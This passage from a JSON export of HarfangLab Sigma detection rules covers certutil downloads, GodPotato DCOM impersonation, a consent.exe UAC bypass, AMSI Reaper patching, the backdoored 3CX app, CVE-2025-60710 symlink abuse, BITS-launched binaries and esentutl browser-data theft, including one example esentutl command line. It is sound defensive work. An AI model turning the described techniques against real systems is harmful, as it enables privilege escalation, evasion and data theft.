"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073715Z",
"creation_date": "2026-03-23T11:45:34.073717Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073721Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_certutil_download_usage.yml",
"content": "title: File Downloaded via Certutil\nid: 23c4819b-cfa3-4862-a35c-8735c0ec96a4\ndescription: |\n Detects usage of certutil.exe to download a file from a given URL.\n Adversaries may transfer tools or other files from an external system into a compromised environment through Certutil to evade detection.\n It is recommended to analyze the parent process and the downloaded file to look for malicious content or actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Certutil/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2021/05/26\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1105\n - attack.s0160\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Certutil\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_common_1:\n - Image|endswith: '\\certutil.exe'\n # Renamed binaries\n - OriginalFileName: 'CertUtil.exe'\n\n selection_common_2:\n CommandLine|contains:\n - ' -split '\n - ' /split '\n\n selection_common_3:\n CommandLine|contains:\n - ' -f '\n - ' /f '\n\n selection_variant_urlcache:\n CommandLine|contains:\n - ' -urlcache '\n - ' /urlcache '\n\n selection_variant_verifyctl:\n CommandLine|contains:\n - ' -verifyctl '\n - ' /verifyctl '\n\n condition: all of selection_common_* and 1 of selection_variant_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "23c4819b-cfa3-4862-a35c-8735c0ec96a4",
"rule_name": "File Downloaded via Certutil",
"rule_description": "Detects usage of certutil.exe to download a file from a given URL.\nAdversaries may transfer tools or other files from an external system into a compromised environment through Certutil to evade detection.\nIt is recommended to analyze the parent process and the downloaded file to look for malicious content or actions.\n",
"rule_creation_date": "2021-05-26",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "23c6fc5b-6b2b-4ae3-8b4c-fbac861ae8b5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072727Z",
"creation_date": "2026-03-23T11:45:34.072730Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072734Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/BeichenDream/GodPotato",
"https://attack.mitre.org/techniques/T1021/003/"
],
"name": "t1021_003_suspicious_process_via_dcom.yml",
"content": "title: Suspicious Process Launched via DCOM\nid: 23c6fc5b-6b2b-4ae3-8b4c-fbac861ae8b5\ndescription: |\n Detects a suspicious process launch with token impersonation via DCOM that can be the result of privilege escalation.\n The GodPotato hacktool is known to use this method.\n It is recommended to investigate the launched process to determine its legitimacy.\nreferences:\n - https://github.com/BeichenDream/GodPotato\n - https://attack.mitre.org/techniques/T1021/003/\ndate: 2023/10/27\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage: '?:\\Windows\\System32\\svchost.exe'\n ParentCommandLine|contains: 'seclogon'\n UserSID: 'S-1-5-20'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "23c6fc5b-6b2b-4ae3-8b4c-fbac861ae8b5",
"rule_name": "Suspicious Process Launched via DCOM",
"rule_description": "Detects a suspicious process launch with token impersonation via DCOM that can be the result of privilege escalation.\nThe GodPotato hacktool is known to use this method.\nIt is recommended to investigate the launched process to determine its legitimacy.\n",
"rule_creation_date": "2023-10-27",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "23ec89c2-af05-41a4-aa3a-a08516d8e33c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093309Z",
"creation_date": "2026-03-23T11:45:34.093311Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093316Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_consent.yml",
"content": "title: UAC Bypass Executed via consent\nid: 23ec89c2-af05-41a4-aa3a-a08516d8e33c\ndescription: |\n Detects an unsigned DLL being loaded by consent.exe.\n This may be indicative of a technique used for circumventing User Account Control (UAC) to escalate privileges.\n Windows User Account Control allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the behavior of consent.exe and to identify the process responsible for the DLL file creation.\nreferences:\n - https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/09/10\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.002\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\consent.exe'\n ImageLoaded|endswith: '\\Windows\\System32\\consent.exe.local\\\\*\\comctl32.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "23ec89c2-af05-41a4-aa3a-a08516d8e33c",
"rule_name": "UAC Bypass Executed via consent",
"rule_description": "Detects an unsigned DLL being loaded by consent.exe.\nThis may be indicative of a technique used for circumventing User Account Control (UAC) to escalate privileges.\nWindows User Account Control allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the behavior of consent.exe and to identify the process responsible for the DLL file creation.\n",
"rule_creation_date": "2020-09-10",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "240337a9-d676-4c03-b22e-8f7efcef8f2d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086779Z",
"creation_date": "2026-03-23T11:45:34.086781Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086786Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/h0ru/AMSI-Reaper",
"https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_amsi_reaper_powershell.yml",
"content": "title: PowerShell AMSI Reaper Executed\nid: 240337a9-d676-4c03-b22e-8f7efcef8f2d\ndescription: |\n Detects the execution of the AMSI (Antimalware Scan Interface) Reaper PowerShell tool.\n This tool prevents Windows AMSI from scanning a specified process by patching the entry point of AmsiOpenSession in amsi.dll.\n It is recommended to analyze the process executing this PowerShell script as well as to look for other types of malicious behavior on the target host.\nreferences:\n - https://github.com/h0ru/AMSI-Reaper\n - https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2024/02/07\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.AMSIReaper\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_name:\n PowershellCommand|contains: 'AMSIReaper'\n\n selection_amsi:\n PowershellCommand|contains|all:\n - 'AmsiOpenSession'\n - 'amsi.dll'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "240337a9-d676-4c03-b22e-8f7efcef8f2d",
"rule_name": "PowerShell AMSI Reaper Executed",
"rule_description": "Detects the execution of the AMSI (Antimalware Scan Interface) Reaper PowerShell tool.\nThis tool prevents Windows AMSI from scanning a specified process by patching the entry point of AmsiOpenSession in amsi.dll.\nIt is recommended to analyze the process executing this PowerShell script as well as to look for other types of malicious behavior on the target host.\n",
"rule_creation_date": "2024-02-07",
"rule_modified_date": "2025-02-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "24117cea-8f26-491f-a109-aa3ea8e9fc04",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604215Z",
"creation_date": "2026-03-23T11:45:34.604218Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604225Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats",
"https://www.trendmicro.com/de_de/research/23/c/information-on-attacks-involving-3cx-desktop-app.html",
"https://attack.mitre.org/techniques/T1102/"
],
"name": "t1102_3cx_github_dns.yml",
"content": "title: Backdoored 3CXDesktopApp Github Communication Detected\nid: 24117cea-8f26-491f-a109-aa3ea8e9fc04\ndescription: |\n Detects DNS requests to github.com and raw.githubusercontent.com made by the 3CXDesktopApp software.\n In late March 2023, the 3CXDesktopApp software was backdoored and turned into a stealer in a wide supply chain attack.\n The backdoored 3CXDesktopApp gathers C2 URLs through a GitHub repository.\n It is recommended to terminate the 3CX software, to update it to a safe version and to look for signs of malicious actions stemming from the 3CX process.\nreferences:\n - https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats\n - https://www.trendmicro.com/de_de/research/23/c/information-on-attacks-involving-3cx-desktop-app.html\n - https://attack.mitre.org/techniques/T1102/\ndate: 2023/03/31\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1195.002\n - attack.command_and_control\n - attack.t1102\n - attack.t1071.001\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Trojan.3CX\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName:\n - 'github.com'\n - 'raw.githubusercontent.com'\n ProcessOriginalFileName: '3CXDesktopApp.exe'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "24117cea-8f26-491f-a109-aa3ea8e9fc04",
"rule_name": "Backdoored 3CXDesktopApp Github Communication Detected",
"rule_description": "Detects DNS requests to github.com and raw.githubusercontent.com made by the 3CXDesktopApp software.\nIn late March 2023, the 3CXDesktopApp software was backdoored and turned into a stealer in a wide supply chain attack.\nThe backdoored 3CXDesktopApp gathers C2 URLs through a GitHub repository.\nIt is recommended to terminate the 3CX software, to update it to a safe version and to look for signs of malicious actions stemming from the 3CX process.\n",
"rule_creation_date": "2023-03-31",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1102",
"attack.t1195.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "244d41bc-5373-4c23-8781-b57d4dd31e2d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604446Z",
"creation_date": "2026-03-23T11:45:34.604449Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604457Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Wh04m1001/CVE-2025-60710",
"https://nvd.nist.gov/vuln/detail/CVE-2025-60710",
"https://attack.mitre.org/techniques/T1187/"
],
"name": "cve_2025_60710_windows_recall.yml",
"content": "title: CVE-2025-60710 Windows Recall Privilege Escalation\nid: 244d41bc-5373-4c23-8781-b57d4dd31e2d\ndescription: |\n Detects the file manipulation associated with the exploitation of CVE-2025-60710: a GUID-named folder under %LOCALAPPDATA%\\CoreAIPlatform.00\\UKP being renamed to a location under the Windows directory by a process that is not running as SYSTEM.\n CVE-2025-60710 is a local privilege escalation issue where a Windows scheduled task (WindowsAI\\Recall\\PolicyConfiguration) deletes GUID-pattern folders in %LOCALAPPDATA% without validating symlinks.\n A low privilege user can plant a malicious symlinked directory to force SYSTEM level arbitrary folder deletion.\n The task’s multiple triggers let an attacker reliably invoke the deletion.\n It is recommended to check the related process for suspicious activities.\nreferences:\n - https://github.com/Wh04m1001/CVE-2025-60710\n - https://nvd.nist.gov/vuln/detail/CVE-2025-60710\n - https://attack.mitre.org/techniques/T1187/\ndate: 2025/11/14\nmodified: 2025/11/17\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - cve.2025-60710\n - classification.Windows.Source.Filesystem\n - classification.Windows.Exploit.Recall\n - classification.Windows.Exploit.CVE-2025-60710\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: filesystem_rename\ndetection:\n selection:\n Path: '?:\\Users\\\\*\\AppData\\Local\\CoreAIPlatform.00\\UKP\\{????????-????-????-????-????????????}'\n TargetPath|startswith: '?:\\Windows'\n\n filter_system:\n ProcessUserSID: 'S-1-5-18'\n\n condition: selection and not filter_system\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "244d41bc-5373-4c23-8781-b57d4dd31e2d",
"rule_name": "CVE-2025-60710 Windows Recall Privilege Escalation",
"rule_description": "Detects the file manipulation associated with the exploitation of CVE-2025-60710: a GUID-named folder under %LOCALAPPDATA%\\CoreAIPlatform.00\\UKP being renamed to a location under the Windows directory by a process that is not running as SYSTEM.\nCVE-2025-60710 is a local privilege escalation issue where a Windows scheduled task (WindowsAI\\Recall\\PolicyConfiguration) deletes GUID-pattern folders in %LOCALAPPDATA% without validating symlinks.\nA low privilege user can plant a malicious symlinked directory to force SYSTEM level arbitrary folder deletion.\nThe task’s multiple triggers let an attacker reliably invoke the deletion.\nIt is recommended to check the related process for suspicious activities.\n",
"rule_creation_date": "2025-11-14",
"rule_modified_date": "2025-11-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "24693ed1-f629-47e5-bb5e-0ce442188fe9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071195Z",
"creation_date": "2026-03-23T11:45:34.071197Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071201Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows/win32/api/bits/nn-bits-ibackgroundcopymanager",
"https://blog.menasec.net/2021/05/hunting-for-suspicious-usage-of.html",
"https://attack.mitre.org/techniques/T1197/",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/software/S0190/"
],
"name": "t1197_suspicious_binary_launched_by_bits.yml",
"content": "title: Suspicious Binary Launched via BITS\nid: 24693ed1-f629-47e5-bb5e-0ce442188fe9\ndescription: |\n Detects execution of suspicious binary launched by BITS.\n This is typically the case of programs set to execute via the SetNotifyCmdline method from IBackgroundCopyManager interface.\n This method is often used by attackers to download malicious files, exfiltrate data or maintain persistence.\n It is recommended to investigate the created process for suspicious activities.\nreferences:\n - https://docs.microsoft.com/en-us/windows/win32/api/bits/nn-bits-ibackgroundcopymanager\n - https://blog.menasec.net/2021/05/hunting-for-suspicious-usage-of.html\n - https://attack.mitre.org/techniques/T1197/\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/software/S0190/\ndate: 2021/07/30\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1197\n - attack.command_and_control\n - attack.t1105\n - attack.s0190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # C:\\Windows\\System32\\svchost.exe -k netsvcs -p -s BITS\n ParentImage|endswith: '\\svchost.exe'\n ParentCommandLine|contains: ' BITS'\n\n exclusion_bits:\n CommandLine: '?:\\windows\\System32\\svchost.exe -k netsvcs -p -s BITS'\n ParentCommandLine: '?:\\windows\\System32\\svchost.exe -k netsvcs -p -s BITS'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_directxdatabaseupdater.exe:\n # C:\\Windows\\System32\\directxdatabaseupdater.exe\n Image|endswith: '\\directxdatabaseupdater.exe'\n OriginalFileName: 'DirectXDatabaseUpdater.exe'\n\n exclusion_werfault:\n Image|endswith: '\\WerFault.exe'\n CommandLine|contains: 
'\\WerFault.exe -u -p '\n OriginalFileName: 'WerFault.exe'\n Signed: 'true'\n\n exclusion_mcafee:\n # McAfee WebAdvisor(bootstrap installer) (SaBsi module)\n ProcessSignature:\n - 'McAfee, Inc.'\n - 'McAfee, LLC'\n - 'MUSARUBRA US LLC' # new signer name for mcafee/trellix it seems\n\n exclusion_yandex:\n Image|endswith: '\\Yandex\\YandexBrowser\\Application\\browser.exe'\n Signed: 'true'\n ProcessSignature: 'YANDEX LLC'\n\n exclusion_opera_setup:\n Image|endswith: '\\OperaSetup.exe'\n Signed: 'true'\n Signature: 'Opera Norway AS'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "24693ed1-f629-47e5-bb5e-0ce442188fe9",
"rule_name": "Suspicious Binary Launched via BITS",
"rule_description": "Detects the execution of a suspicious binary launched by the BITS service (a svchost.exe process hosting BITS).\nThis is typically the case of programs set to execute via the SetNotifyCmdline method of the IBackgroundCopyManager interface.\nThis method is often used by attackers to download malicious files, exfiltrate data or maintain persistence.\nNote that binaries located under Program Files are excluded on their path alone, without a signature check.\nIt is recommended to investigate the created process for suspicious activities.\n",
"rule_creation_date": "2021-07-30",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1197"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "248a91c7-af38-4792-8ffb-942e6e7ce41b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611456Z",
"creation_date": "2026-03-23T11:45:34.611459Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611466Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/",
"https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/",
"https://www.trendmicro.com/fr_fr/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html",
"https://attack.mitre.org/techniques/T1005/"
],
"name": "t1005_suspicious_browser_data_theft.yml",
"content": "title: Possible Browser Data Theft via Esentutl\nid: 248a91c7-af38-4792-8ffb-942e6e7ce41b\ndescription: |\n Detects the suspicious execution of the legitimate esentutl.exe Windows binary to collect browser data from Internet Explorer and Microsoft Edge via the web cache.\n The Qakbot malware is known to use this technique to steal sensitive information.\n It is recommended to analyze the process responsible for the execution of Esentutl to determine whether its usage is legitimate.\nreferences:\n - https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/\n - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/\n - https://www.trendmicro.com/fr_fr/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html\n - https://attack.mitre.org/techniques/T1005/\ndate: 2022/04/22\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Esentutl\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Collection\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\esentutl.exe'\n # esentutl.exe /r V01 /lC:\\Users\\xxx\\AppData\\Local\\Microsoft\\Windows\\WebCache /sC:\\Users\\xxx\\AppData\\Local\\Microsoft\\Windows\\WebCache /dC:\\Users\\xxx\\AppData\\Local\\Microsoft\\Windows\\WebCache\n CommandLine|contains|all:\n - 'esentutl.exe'\n - ' /r V01 '\n - ' /l'\n - ' /s'\n - ' /d'\n - '\\AppData\\Local\\Microsoft\\Windows\\WebCache'\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "248a91c7-af38-4792-8ffb-942e6e7ce41b",
"rule_name": "Possible Browser Data Theft via Esentutl",
"rule_description": "Detects the suspicious execution of the legitimate esentutl.exe Windows binary to collect browser data from Internet Explorer and Microsoft Edge via the web cache.\nThe Qakbot malware is known to use this technique to steal sensitive information.\nIt is recommended to analyze the process responsible for the execution of Esentutl to determine whether its usage is legitimate.\n",
"rule_creation_date": "2022-04-22",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "24914a2f-f501-410c-8f63-d70ae6a01f4d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617329Z",
"creation_date": "2026-03-23T11:45:34.617331Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617335Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://persistence-info.github.io/Data/aedebug.html",
